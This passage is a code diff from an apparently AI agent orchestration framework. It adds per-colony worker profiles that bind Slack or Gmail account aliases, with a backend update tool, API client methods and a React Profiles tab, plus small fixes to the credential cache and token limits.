# the very next CredentialStoreAdapter.default() call. The adapter
# cache is keyed on this env var.
os.environ["ADEN_API_KEY"] = key
_reset_credential_adapter_cache()
# Immediately sync OAuth tokens from Aden (runs in executor because
# _presync_aden_tokens makes blocking HTTP calls to the Aden server).
try:
@@ -193,6 +214,11 @@ async def handle_delete_credential(request: web.Request) -> web.Response:
deleted = delete_aden_api_key()
if not deleted:
return web.json_response({"error": "Credential 'aden_api_key' not found"}, status=404)
# Drop the env var so the next adapter rebuild lands in the
# non-Aden branch instead of trying to reuse the stale key.
os.environ.pop("ADEN_API_KEY", None)
_reset_credential_adapter_cache()
_invalidate_queen_credentials_cache(request)
return web.json_response({"deleted": True})
store = _get_store(request)
@@ -358,6 +384,9 @@ async def handle_resync_credentials(request: web.Request) -> web.Response:
# _presync_aden_tokens makes blocking HTTP calls to the Aden server.
await loop.run_in_executor(None, lambda: _presync_aden_tokens(CREDENTIAL_SPECS, force=True))
# Drop the cached adapter so newly-fetched accounts are visible
# to the next MCP tool call without waiting for a process restart.
_reset_credential_adapter_cache()
_invalidate_queen_credentials_cache(request)
accounts_by_provider = _collect_accounts_by_provider()
+65
View File
@@ -1151,6 +1151,7 @@ async def fork_session_into_colony(
task: str,
tasks: list[dict] | None = None,
concurrency_hint: int | None = None,
worker_profiles: list[dict] | None = None,
) -> dict:
"""Fork a queen session into a colony directory.
@@ -1398,6 +1399,56 @@ async def fork_session_into_colony(
worker_meta["concurrency_hint"] = concurrency_hint
worker_config_path.write_text(json.dumps(worker_meta, indent=2, ensure_ascii=False), encoding="utf-8")
# ── 2a. Materialize named worker profiles ────────────────────
# Each named profile gets its own ``profiles/<name>/worker.json``
# cloned from the base worker_meta with profile-specific overrides
# (task, system_prompt, tool_filter, concurrency_hint). The base
# ``worker.json`` above acts as the implicit "default" profile.
persisted_profiles: list[dict] = []
if worker_profiles:
from framework.host.worker_profiles import (
DEFAULT_PROFILE_NAME,
WorkerProfile,
validate_profile_name,
worker_spec_path,
)
for raw in worker_profiles:
if not isinstance(raw, dict):
continue
profile = WorkerProfile.from_dict(raw)
err = validate_profile_name(profile.name)
if err is not None:
logger.warning("create_colony: invalid profile name %r: %s", profile.name, err)
continue
profile_meta = dict(worker_meta)
profile_meta["profile_name"] = profile.name
if profile.task:
profile_meta["goal"] = {
**profile_meta.get("goal", {}),
"description": profile.task,
}
if profile.prompt_override:
profile_meta["system_prompt"] = (
f"{worker_meta['system_prompt']}\n\n{profile.prompt_override}"
)
if profile.tool_filter:
profile_meta["tools"] = [t for t in worker_meta["tools"] if t in set(profile.tool_filter)]
if isinstance(profile.concurrency_hint, int) and profile.concurrency_hint > 0:
profile_meta["concurrency_hint"] = profile.concurrency_hint
if profile.integrations:
profile_meta["integrations"] = dict(profile.integrations)
target = worker_spec_path(colony_name, profile.name)
if profile.name == DEFAULT_PROFILE_NAME:
# Skip — the legacy file already written above is the
# canonical default.
persisted_profiles.append(profile.to_dict())
continue
target.parent.mkdir(parents=True, exist_ok=True)
target.write_text(json.dumps(profile_meta, indent=2, ensure_ascii=False), encoding="utf-8")
persisted_profiles.append(profile.to_dict())
# ── 3. Duplicate queen session into colony ───────────────────
# Copy the queen's full session directory (conversations, events,
# meta) into a new queen-session dir assigned to this colony.
@@ -1577,6 +1628,20 @@ async def fork_session_into_colony(
"task": worker_task[:100],
"spawned_at": datetime.now(UTC).isoformat(),
}
if persisted_profiles:
# Persist the canonical profile roster so dispatch + UI can read
# back what the queen declared at create_colony time. Merge with
# any existing list so a later update_worker_profile call doesn't
# erase profiles created in an earlier fork.
existing_profiles = metadata.get("worker_profiles") or []
if not isinstance(existing_profiles, list):
existing_profiles = []
seen = {p["name"] for p in persisted_profiles if isinstance(p, dict) and p.get("name")}
merged = list(persisted_profiles) + [
p for p in existing_profiles
if isinstance(p, dict) and p.get("name") and p["name"] not in seen
]
metadata["worker_profiles"] = merged
metadata_path.write_text(json.dumps(metadata, indent=2, ensure_ascii=False), encoding="utf-8")
# ── 4a. Inherit the queen's tool allowlist into the colony ───
+5 -2
View File
@@ -19,7 +19,7 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Literal
from framework.config import QUEENS_DIR
from framework.config import QUEENS_DIR, get_max_tokens
from framework.host.triggers import TriggerDefinition
logger = logging.getLogger(__name__)
@@ -700,7 +700,10 @@ class SessionManager:
available_tools=all_tools,
goal_context=goal.to_prompt_context(),
goal=goal,
max_tokens=8192,
# Worker output cap — pull from configuration.json instead of
# hard-coding 8192. glm-5.1/kimi-k2.5 both support 32k out, and
# capping at 8k silently truncates long worker turns mid-tool.
max_tokens=get_max_tokens(),
stream_id=worker_name,
execution_id=worker_name,
identity_prompt=worker_data.get("identity_prompt", ""),
@@ -11,7 +11,7 @@ metadata:
**Applies when** your spawn message has `db_path:` and `colony_id:` fields. The DB is your durable working memory — tells you what's done, what to skip, which SOP gates you owe.
Access via `execute_command_tool` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
Access via `terminal_exec` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
### Claim: assigned task (check this FIRST)
@@ -410,7 +410,7 @@ In all of these cases the script is SHORT (< 10 lines) and the result is CONSUME
- If a tool fails, retry once with the same approach.
- If it fails a second time, STOP retrying and switch approach.
- If `browser_snapshot` fails, try `browser_get_text` with a specific small selector as fallback.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_start`, then retry.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_open(url)` again to recreate a fresh context.
## Verified workflows
@@ -1642,6 +1642,7 @@ def register_queen_lifecycle_tools(
tasks: list[dict] | None = None,
concurrency_hint: int | None = None,
triggers: list[dict] | None = None,
worker_profiles: list[dict] | None = None,
) -> str:
"""Create a colony and materialize its skill folder in one atomic call.
@@ -1822,6 +1823,7 @@ def register_queen_lifecycle_tools(
concurrency_hint=(
concurrency_hint if isinstance(concurrency_hint, int) and concurrency_hint > 0 else None
),
worker_profiles=worker_profiles if isinstance(worker_profiles, list) else None,
)
except Exception as e:
logger.exception("create_colony: fork failed after installing skill")
@@ -2184,6 +2186,46 @@ def register_queen_lifecycle_tools(
"required": ["id", "trigger_type", "trigger_config", "task"],
},
},
"worker_profiles": {
"type": "array",
"description": (
"Optional roster of worker profiles. Use this "
"when the colony needs to operate multiple "
"authorized accounts of the same vendor (two "
"Slack workspaces, two Gmail accounts) — each "
"profile pins its own credential alias so workers "
"spawned under that profile call Slack/Gmail/etc. "
"as the right account by default. If omitted, the "
"colony has a single implicit 'default' profile "
"that uses each provider's primary account. Each "
"entry: name (lowercase id, unique within the "
"colony), integrations (provider id → account "
"alias, e.g. {'slack': 'work'}), optional task "
"(per-profile task override), optional skill_name "
"(if the profile uses a different skill than the "
"colony default), optional concurrency_hint, "
"prompt_override, tool_filter."
),
"items": {
"type": "object",
"properties": {
"name": {"type": "string"},
"task": {"type": "string"},
"skill_name": {"type": "string"},
"integrations": {
"type": "object",
"additionalProperties": {"type": "string"},
},
"concurrency_hint": {"type": "integer", "minimum": 1},
"prompt_override": {"type": "string"},
"tool_filter": {
"type": "array",
"items": {"type": "string"},
},
},
"required": ["name"],
},
},
},
"required": [
"colony_name",
@@ -2201,6 +2243,116 @@ def register_queen_lifecycle_tools(
)
tools_registered += 1
# --- update_worker_profile ---------------------------------------------------
async def update_worker_profile(
    *,
    colony_name: str,
    profile_name: str,
    integrations: dict[str, str] | None = None,
    task: str | None = None,
    skill_name: str | None = None,
    concurrency_hint: int | None = None,
    prompt_override: str | None = None,
    tool_filter: list[str] | None = None,
) -> str:
    """Insert or update a single worker profile on an existing colony.

    Use this to adjust an account binding ("switch the slack-work
    profile from alias 'work' to alias 'work-2'") or to add a new
    profile after the colony was already created. Existing siblings
    are preserved. Pass only the fields you want to change; ``None``
    means "don't touch", and an empty dict/list means "clear".

    Returns a JSON string: either ``{"error": ...}`` or
    ``{"ok": true, "colony_name": ..., "profile_name": ...,
    "worker_profiles": [...]}`` with the full saved roster.
    """
    # Deferred import — NOTE(review): presumably avoids an import cycle
    # with framework.host at module load time; confirm before hoisting.
    from framework.host.worker_profiles import (
        WorkerProfile,
        get_worker_profile,
        upsert_worker_profile,
        validate_profile_name,
    )

    # Validate inputs first; every failure is reported as a JSON error
    # payload rather than an exception, since this is a tool entry point.
    cn = (colony_name or "").strip()
    if not _COLONY_NAME_RE.match(cn):
        return json.dumps(
            {"error": "colony_name must be lowercase alphanumeric with underscores."}
        )
    err = validate_profile_name(profile_name)
    if err is not None:
        return json.dumps({"error": err})
    # Seed the merge from the existing profile (if any) so fields the
    # caller leaves as None survive the update untouched. Collections
    # are copied defensively so we never mutate the loaded profile.
    existing = get_worker_profile(cn, profile_name)
    merged = WorkerProfile(
        name=profile_name,
        task=existing.task if existing else "",
        skill_name=existing.skill_name if existing else "",
        integrations=dict(existing.integrations) if existing else {},
        concurrency_hint=existing.concurrency_hint if existing else None,
        prompt_override=existing.prompt_override if existing else None,
        tool_filter=list(existing.tool_filter) if (existing and existing.tool_filter) else None,
    )
    # Per-field overrides: None ⇒ keep existing value; an empty dict/list
    # (or falsy string) ⇒ clear, matching the docstring contract.
    if integrations is not None:
        # Coerce keys/values to str and drop entries with empty key or value.
        merged.integrations = {str(k): str(v) for k, v in integrations.items() if str(k) and str(v)}
    if task is not None:
        merged.task = task
    if skill_name is not None:
        merged.skill_name = skill_name
    if concurrency_hint is not None:
        # Only positive ints are kept; anything else clears the hint.
        merged.concurrency_hint = (
            concurrency_hint if isinstance(concurrency_hint, int) and concurrency_hint > 0 else None
        )
    if prompt_override is not None:
        merged.prompt_override = prompt_override or None
    if tool_filter is not None:
        merged.tool_filter = list(tool_filter) if tool_filter else None
    # Persist; upsert raises FileNotFoundError for a missing colony and
    # ValueError for invalid profile data — both surfaced as JSON errors.
    try:
        saved = upsert_worker_profile(cn, merged)
    except (FileNotFoundError, ValueError) as exc:
        return json.dumps({"error": str(exc)})
    return json.dumps(
        {
            "ok": True,
            "colony_name": cn,
            "profile_name": profile_name,
            "worker_profiles": [p.to_dict() for p in saved],
        }
    )
_update_worker_profile_tool = Tool(
name="update_worker_profile",
description=(
"Insert or update one worker profile on an existing colony. "
"Use this to swap a profile's account alias (e.g. 'switch "
"slack-work to use alias work-2') or to add a profile after "
"create_colony. Existing siblings are preserved. Pass only "
"the fields you want to change."
),
parameters={
"type": "object",
"properties": {
"colony_name": {"type": "string"},
"profile_name": {"type": "string"},
"integrations": {
"type": "object",
"additionalProperties": {"type": "string"},
},
"task": {"type": "string"},
"skill_name": {"type": "string"},
"concurrency_hint": {"type": "integer", "minimum": 1},
"prompt_override": {"type": "string"},
"tool_filter": {"type": "array", "items": {"type": "string"}},
},
"required": ["colony_name", "profile_name"],
},
)
registry.register(
"update_worker_profile",
_update_worker_profile_tool,
lambda inputs: update_worker_profile(**inputs),
)
tools_registered += 1
# --- start_incubating_colony -------------------------------------------------
async def start_incubating_colony(
+1264 -2
View File
File diff suppressed because it is too large Load Diff
+2
View File
@@ -11,7 +11,9 @@
},
"dependencies": {
"clsx": "^2.1.1",
"echarts": "^5.6.0",
"lucide-react": "^0.575.0",
"mermaid": "^11.14.0",
"react": "^18.3.1",
"react-dom": "^18.3.1",
"react-markdown": "^10.1.0",
+37
View File
@@ -25,6 +25,19 @@ export interface ColonyToolsUpdateResult {
note?: string;
}
/** A worker template within a colony. ``integrations`` maps provider
 * id (``slack``, ``google``, etc.) to the alias of the connected
 * account this profile pins by default for MCP tool calls. */
export interface WorkerProfile {
  /** Unique profile id within the colony (lowercase identifier). */
  name: string;
  /** Optional per-profile task override for workers spawned under it. */
  task?: string;
  /** Optional skill to use instead of the colony default. */
  skill_name?: string;
  /** Provider id → connected-account alias, e.g. { slack: "work" }. */
  integrations?: Record<string, string>;
  /** Optional per-profile worker concurrency (positive integer). */
  concurrency_hint?: number;
  /** Optional extra text appended to the worker system prompt. */
  prompt_override?: string;
  /** When set, restricts the worker to this subset of tool names. */
  tool_filter?: string[];
}
export const coloniesApi = {
/** List every colony on disk with a summary of its tool allowlist. */
list: () =>
@@ -47,4 +60,28 @@ export const coloniesApi = {
`/colony/${encodeURIComponent(colonyName)}/tools`,
{ enabled_mcp_tools: enabled },
),
/** List the colony's worker profiles. Always returns at least one
* entry — legacy colonies materialise a synthetic ``default``. */
listWorkerProfiles: (colonyName: string) =>
api.get<{ worker_profiles: WorkerProfile[] }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles`,
),
/** Insert or replace a single worker profile. Existing siblings are
* preserved. The desktop uses this for both add and edit. */
upsertWorkerProfile: (colonyName: string, profile: WorkerProfile) =>
api.post<{ worker_profiles: WorkerProfile[] }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles`,
profile,
),
/** Delete a worker profile. Returns 409 with ``bound_workers`` when a
* live worker is still using it; the UI should prompt the user to
* stop those workers first. The synthetic ``default`` profile cannot
* be deleted. */
deleteWorkerProfile: (colonyName: string, profileName: string) =>
api.delete<{ deleted: boolean; profile_name: string }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles/${encodeURIComponent(profileName)}`,
),
};
+5
View File
@@ -14,6 +14,11 @@ export interface WorkerSummary {
status: string;
started_at: number;
result: WorkerResult | null;
/** Name of the colony's worker profile this worker was spawned from.
* Empty for legacy / single-template colonies. Surfaced as a small
* badge in the Sessions tab so the user can see which authorized
* account the worker is calling MCP tools as. */
profile_name?: string;
}
export interface ColonySkill {
+61 -45
View File
@@ -13,6 +13,9 @@ import {
} from "lucide-react";
import WorkerRunBubble from "@/components/WorkerRunBubble";
import type { WorkerRunGroup } from "@/components/WorkerRunBubble";
import ChartToolDetail, {
type ChartToolEntry,
} from "@/components/charts/ChartToolDetail";
export interface ImageContent {
type: "image_url";
@@ -205,7 +208,7 @@ export function toolHex(name: string): string {
}
export function ToolActivityRow({ content }: { content: string }) {
let tools: { name: string; done: boolean }[] = [];
let tools: ChartToolEntry[] = [];
try {
const parsed = JSON.parse(content);
tools = parsed.tools || [];
@@ -239,52 +242,65 @@ export function ToolActivityRow({ content }: { content: string }) {
if (counts.done > 0) donePills.push({ name, count: counts.done });
}
// Per-call chart embeds: chart_render's result envelope carries the
// spec back, so the chat renders the same chart the server
// rasterized to PNG. Other tools stay pill-only by design.
const chartDetails = tools.filter((t) => t.name.startsWith("chart_"));
return (
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
<div className="flex flex-col gap-0.5">
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
</div>
</div>
{chartDetails.map((t, idx) => (
<ChartToolDetail
key={t.callKey ?? `${t.name}-${idx}`}
entry={t}
/>
))}
</div>
);
}
@@ -15,6 +15,11 @@ import {
Zap,
Activity,
Loader2,
Plus,
Trash2,
Pencil,
Check,
Link2,
} from "lucide-react";
import {
colonyWorkersApi,
@@ -24,6 +29,8 @@ import {
type ProgressStep,
type WorkerSummary,
} from "@/api/colonyWorkers";
import { coloniesApi, type WorkerProfile } from "@/api/colonies";
import { credentialsApi } from "@/api/credentials";
import {
colonyDataApi,
type CellValue,
@@ -51,7 +58,7 @@ interface ColonyWorkersPanelProps {
onClose: () => void;
}
type TabKey = "skills" | "tools" | "sessions" | "triggers" | "data";
type TabKey = "skills" | "tools" | "sessions" | "triggers" | "data" | "profiles";
function statusClasses(status: string): string {
const s = status.toLowerCase();
@@ -165,6 +172,7 @@ export default function ColonyWorkersPanel({
{/* Tab bar */}
<div className="flex border-b border-border/60 flex-shrink-0">
<TabButton active={tab === "sessions"} onClick={() => setTab("sessions")} label="Sessions" />
<TabButton active={tab === "profiles"} onClick={() => setTab("profiles")} label="Profiles" />
<TabButton active={tab === "triggers"} onClick={() => setTab("triggers")} label="Triggers" />
<TabButton active={tab === "skills"} onClick={() => setTab("skills")} label="Skills" />
<TabButton active={tab === "tools"} onClick={() => setTab("tools")} label="Tools" />
@@ -175,6 +183,7 @@ export default function ColonyWorkersPanel({
{tab === "sessions" && (
<SessionsTab sessionId={sessionId} colonyName={colonyName} />
)}
{tab === "profiles" && <ProfilesTab colonyName={colonyName} />}
{tab === "triggers" && <TriggersTab sessionId={sessionId} />}
{tab === "skills" && <SkillsTab sessionId={sessionId} />}
{tab === "tools" && <ToolsTab sessionId={sessionId} />}
@@ -630,11 +639,21 @@ function SessionsTab({
className="w-full text-left px-3 py-2.5"
>
<div className="flex items-center justify-between mb-1 gap-2">
<code
className={`text-xs font-mono ${active ? "text-foreground" : "text-foreground/70"}`}
>
{shortId(w.worker_id)}
</code>
<div className="flex items-center gap-1.5 min-w-0">
<code
className={`text-xs font-mono ${active ? "text-foreground" : "text-foreground/70"}`}
>
{shortId(w.worker_id)}
</code>
{w.profile_name && (
<span
className="text-[10px] px-1.5 py-0.5 rounded-full bg-primary/10 text-primary font-medium truncate"
title={`Worker profile: ${w.profile_name}`}
>
{w.profile_name}
</span>
)}
</div>
<div className="flex items-center gap-1">
<span
className={`text-[10px] px-1.5 py-0.5 rounded-full font-medium ${statusClasses(w.status)}`}
@@ -1922,3 +1941,467 @@ function TabShell({
</div>
);
}
// ── Profiles tab ───────────────────────────────────────────────────────
//
// Lists the colony's worker profiles. Each profile pins a default
// account alias per provider so workers spawned under it call MCP
// tools as the right Slack workspace / Gmail account / etc. The alias
// dropdown only shows aliases the user has already authorized through
// the integrations page — typo-prone free-form entry was rejected as a
// foothold for misdirected tool calls.
//
// Delete is refused while a worker is still bound to the profile; the
// 409 surfaces as an inline notice listing the worker IDs the user
// needs to stop first.
function ProfilesTab({ colonyName }: { colonyName: string | null }) {
  const [profiles, setProfiles] = useState<WorkerProfile[]>([]);
  // provider id → list of connected-account aliases available for binding.
  const [accounts, setAccounts] = useState<Record<string, string[]>>({});
  // provider id → alias → identity fields (email/name) for tooltips.
  const [accountIdentities, setAccountIdentities] = useState<
    Record<string, Record<string, Record<string, string>>>
  >({});
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState<string | null>(null);
  // Name of the profile currently open in the inline editor, if any.
  const [editingName, setEditingName] = useState<string | null>(null);
  const [creating, setCreating] = useState(false);
  // True while a save/delete request is in flight; disables buttons.
  const [busy, setBusy] = useState(false);
  // Inline 409 notice listing workers still bound to a profile.
  const [boundWarning, setBoundWarning] = useState<string | null>(null);

  // Load profiles and connected accounts together — the editor's alias
  // dropdowns need both before the tab is usable.
  const refresh = useCallback(() => {
    if (!colonyName) {
      setLoading(false);
      return;
    }
    setLoading(true);
    setError(null);
    Promise.all([
      coloniesApi.listWorkerProfiles(colonyName),
      credentialsApi.listSpecs(),
    ])
      .then(([profileResp, specsResp]) => {
        setProfiles(profileResp.worker_profiles ?? []);
        const aliasMap: Record<string, string[]> = {};
        const idMap: Record<string, Record<string, Record<string, string>>> = {};
        for (const spec of specsResp.specs ?? []) {
          // Only Aden-managed providers can be bound to profiles.
          if (!spec.aden_supported) continue;
          const provider = spec.credential_id;
          const aliases: string[] = [];
          const idsForProvider: Record<string, Record<string, string>> = {};
          for (const acct of spec.accounts ?? []) {
            if (!acct.alias) continue;
            aliases.push(acct.alias);
            idsForProvider[acct.alias] = acct.identity ?? {};
          }
          // Providers with no aliased accounts are omitted entirely.
          if (aliases.length > 0) {
            aliasMap[provider] = aliases;
            idMap[provider] = idsForProvider;
          }
        }
        setAccounts(aliasMap);
        setAccountIdentities(idMap);
      })
      .catch((e) =>
        setError(
          e?.message ?? "Failed to load worker profiles",
        ),
      )
      .finally(() => setLoading(false));
  }, [colonyName]);

  useEffect(() => {
    refresh();
  }, [refresh]);

  // Shared by both create and edit — the upsert endpoint returns the
  // full roster, so no extra refresh round-trip is needed.
  const handleSave = useCallback(
    async (profile: WorkerProfile) => {
      if (!colonyName) return;
      setBusy(true);
      setError(null);
      setBoundWarning(null);
      try {
        const resp = await coloniesApi.upsertWorkerProfile(colonyName, profile);
        setProfiles(resp.worker_profiles ?? []);
        setEditingName(null);
        setCreating(false);
      } catch (e: unknown) {
        setError((e as Error)?.message ?? "Save failed");
      } finally {
        setBusy(false);
      }
    },
    [colonyName],
  );

  const handleDelete = useCallback(
    async (profileName: string) => {
      if (!colonyName) return;
      setBusy(true);
      setError(null);
      setBoundWarning(null);
      try {
        await coloniesApi.deleteWorkerProfile(colonyName, profileName);
        refresh();
      } catch (e: unknown) {
        // Surface 409 bound_workers payloads as an inline notice with the
        // worker IDs so the user knows exactly what to stop. The api
        // client throws on non-2xx; the parsed response body is attached
        // to the thrown error as `body`.
        const err = e as Error & { body?: { bound_workers?: string[]; error?: string } };
        const bound = err.body?.bound_workers;
        if (Array.isArray(bound) && bound.length > 0) {
          setBoundWarning(
            `Profile "${profileName}" is bound to running worker${
              bound.length === 1 ? "" : "s"
            } ${bound.map(shortId).join(", ")}. Stop them first.`,
          );
        } else {
          setError(err.message ?? "Delete failed");
        }
      } finally {
        setBusy(false);
      }
    },
    [colonyName, refresh],
  );

  if (!colonyName) {
    return (
      <TabShell loading={false} error={null} onRefresh={() => {}} empty="No colony loaded.">
        {null}
      </TabShell>
    );
  }

  return (
    <TabShell
      loading={loading}
      error={error}
      onRefresh={refresh}
      empty={null}
      headerRight={
        // Hide "Add profile" while any editor is open to avoid two
        // concurrent edit surfaces.
        !creating && editingName === null ? (
          <button
            onClick={() => setCreating(true)}
            className="text-[10px] px-2 py-0.5 rounded border border-primary/40 text-primary hover:bg-primary/10 transition-colors inline-flex items-center gap-1"
          >
            <Plus className="w-3 h-3" /> Add profile
          </button>
        ) : null
      }
    >
      <div className="flex flex-col gap-3">
        {boundWarning && (
          <div className="rounded-md border border-amber-500/40 bg-amber-500/[0.06] px-3 py-2 text-xs text-amber-700 dark:text-amber-400">
            {boundWarning}
          </div>
        )}
        <ConnectedAccountsSummary accounts={accounts} identities={accountIdentities} />
        {creating && (
          <ProfileEditor
            mode="create"
            existing={null}
            availableAliases={accounts}
            existingNames={profiles.map((p) => p.name)}
            busy={busy}
            onCancel={() => setCreating(false)}
            onSave={handleSave}
          />
        )}
        {profiles.length === 0 && !creating ? (
          <p className="text-xs text-muted-foreground text-center py-6">
            No profiles yet. The colony spawns one default worker.
          </p>
        ) : (
          <ul className="flex flex-col gap-2">
            {profiles.map((p) =>
              // The row being edited is swapped in place for the editor.
              editingName === p.name ? (
                <li key={p.name}>
                  <ProfileEditor
                    mode="edit"
                    existing={p}
                    availableAliases={accounts}
                    existingNames={profiles.map((x) => x.name)}
                    busy={busy}
                    onCancel={() => setEditingName(null)}
                    onSave={handleSave}
                  />
                </li>
              ) : (
                <li key={p.name}>
                  <ProfileRow
                    profile={p}
                    onEdit={() => {
                      setEditingName(p.name);
                      setBoundWarning(null);
                    }}
                    onDelete={() => handleDelete(p.name)}
                    isDefault={p.name === "default"}
                    busy={busy}
                  />
                </li>
              ),
            )}
          </ul>
        )}
      </div>
    </TabShell>
  );
}
function ConnectedAccountsSummary({
accounts,
identities,
}: {
accounts: Record<string, string[]>;
identities: Record<string, Record<string, Record<string, string>>>;
}) {
const providers = Object.keys(accounts).sort();
if (providers.length === 0) {
return (
<div className="rounded-md border border-border/50 bg-muted/20 px-3 py-2 text-xs text-muted-foreground">
No connected accounts yet connect providers in the integrations page
before binding profiles.
</div>
);
}
return (
<div className="rounded-md border border-border/50 bg-muted/10 px-3 py-2">
<div className="flex items-center gap-1.5 text-[10px] uppercase tracking-wide text-muted-foreground mb-1.5">
<Link2 className="w-3 h-3" /> Connected accounts
</div>
<ul className="flex flex-wrap gap-1.5">
{providers.flatMap((provider) =>
accounts[provider].map((alias) => {
const ident = identities[provider]?.[alias];
const detail = ident?.email || ident?.name || "";
return (
<li
key={`${provider}:${alias}`}
className="text-[10px] px-1.5 py-0.5 rounded-full bg-background border border-border/60 text-foreground/80"
title={detail || `${provider}:${alias}`}
>
<span className="font-medium">{provider}</span>:{alias}
</li>
);
}),
)}
</ul>
</div>
);
}
function ProfileRow({
profile,
onEdit,
onDelete,
isDefault,
busy,
}: {
profile: WorkerProfile;
onEdit: () => void;
onDelete: () => void;
isDefault: boolean;
busy: boolean;
}) {
const integrations = profile.integrations ?? {};
const entries = Object.entries(integrations);
return (
<div className="rounded-lg border border-border/50 bg-background/30 px-3 py-2.5">
<div className="flex items-start justify-between gap-2 mb-1.5">
<div className="min-w-0">
<div className="flex items-center gap-1.5">
<span className="text-xs font-medium text-foreground truncate">
{profile.name}
</span>
{isDefault && (
<span className="text-[9px] px-1 py-0.5 rounded bg-muted text-muted-foreground uppercase tracking-wide">
default
</span>
)}
</div>
{profile.task && (
<p className="text-[11px] text-muted-foreground mt-0.5 line-clamp-2">
{profile.task}
</p>
)}
</div>
<div className="flex items-center gap-1 flex-shrink-0">
<button
onClick={onEdit}
disabled={busy}
className="p-1 rounded text-muted-foreground hover:text-foreground hover:bg-muted/60 disabled:opacity-50 transition-colors"
title="Edit profile"
>
<Pencil className="w-3 h-3" />
</button>
{!isDefault && (
<button
onClick={onDelete}
disabled={busy}
className="p-1 rounded text-destructive hover:bg-destructive/10 disabled:opacity-50 transition-colors"
title="Delete profile"
>
<Trash2 className="w-3 h-3" />
</button>
)}
</div>
</div>
{entries.length > 0 ? (
<ul className="flex flex-wrap gap-1">
{entries.map(([provider, alias]) => (
<li
key={provider}
className="text-[10px] px-1.5 py-0.5 rounded-full bg-primary/10 text-primary border border-primary/20"
>
<span className="font-medium">{provider}</span>:{alias}
</li>
))}
</ul>
) : (
<p className="text-[10px] text-muted-foreground italic">
No integrations bound uses each provider's primary account.
</p>
)}
</div>
);
}
// Inline create/edit form for a single worker profile. The alias
// dropdowns are restricted to already-authorized accounts; the name
// field is immutable in edit mode because it is the profile's identity.
function ProfileEditor({
  mode,
  existing,
  availableAliases,
  existingNames,
  busy,
  onCancel,
  onSave,
}: {
  mode: "create" | "edit";
  existing: WorkerProfile | null;
  availableAliases: Record<string, string[]>;
  existingNames: string[];
  busy: boolean;
  onCancel: () => void;
  onSave: (profile: WorkerProfile) => void;
}) {
  const [name, setName] = useState(existing?.name ?? "");
  const [task, setTask] = useState(existing?.task ?? "");
  // Copy the existing bindings so edits never mutate the parent's object.
  const [bindings, setBindings] = useState<Record<string, string>>(
    () => ({ ...(existing?.integrations ?? {}) }),
  );
  const providers = useMemo(() => Object.keys(availableAliases).sort(), [availableAliases]);

  // Validation runs on every keystroke; a non-null result disables Save.
  // Name rules mirror the backend: lowercase/digits, then _ or - allowed,
  // max 64 chars; duplicates are only rejected when creating.
  const nameError = useMemo(() => {
    if (!name) return "Name is required";
    if (!/^[a-z0-9][a-z0-9_-]{0,63}$/.test(name)) {
      return "lowercase, numbers, _ or - (must start alphanumeric, ≤64)";
    }
    if (mode === "create" && existingNames.includes(name)) {
      return "Name already used";
    }
    return null;
  }, [name, mode, existingNames]);

  // Selecting the empty "— primary —" option removes the binding so the
  // provider falls back to its primary account.
  const setAlias = (provider: string, alias: string) => {
    setBindings((prev) => {
      const next = { ...prev };
      if (alias) next[provider] = alias;
      else delete next[provider];
      return next;
    });
  };

  return (
    <div className="rounded-lg border border-primary/40 bg-primary/[0.04] px-3 py-3 flex flex-col gap-2.5">
      <div>
        <label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
          Profile name
        </label>
        <input
          value={name}
          onChange={(e) => setName(e.target.value)}
          disabled={mode === "edit"}
          className="w-full text-xs px-2 py-1 rounded border border-border/60 bg-background disabled:opacity-60"
          placeholder="slack-work"
        />
        {nameError && (
          <p className="text-[10px] text-destructive mt-0.5">{nameError}</p>
        )}
      </div>
      <div>
        <label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
          Task override (optional)
        </label>
        <textarea
          value={task}
          onChange={(e) => setTask(e.target.value)}
          rows={2}
          className="w-full text-xs px-2 py-1 rounded border border-border/60 bg-background resize-none"
          placeholder="What this profile's worker should do (overrides the colony task)"
        />
      </div>
      <div>
        <label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
          Account bindings
        </label>
        {providers.length === 0 ? (
